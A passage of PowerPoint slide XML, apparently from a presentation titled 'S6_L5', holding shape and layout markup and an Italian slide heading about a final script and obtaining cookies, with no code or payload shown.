                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8115300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8115300" y="2371036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2371036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="864273" y="430536"/>
            <a:ext cx="7940570" cy="3253840"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10587427" cy="4338453"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="10587427" cy="1990725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="5880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>5.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> Script finale e ottenimento cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3718905"/>
              <a:ext cx="10225345" cy="609388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3814"/>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DAGF9JbHz-w</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>S6_L5</dc:title>
</cp:coreProperties>
</file>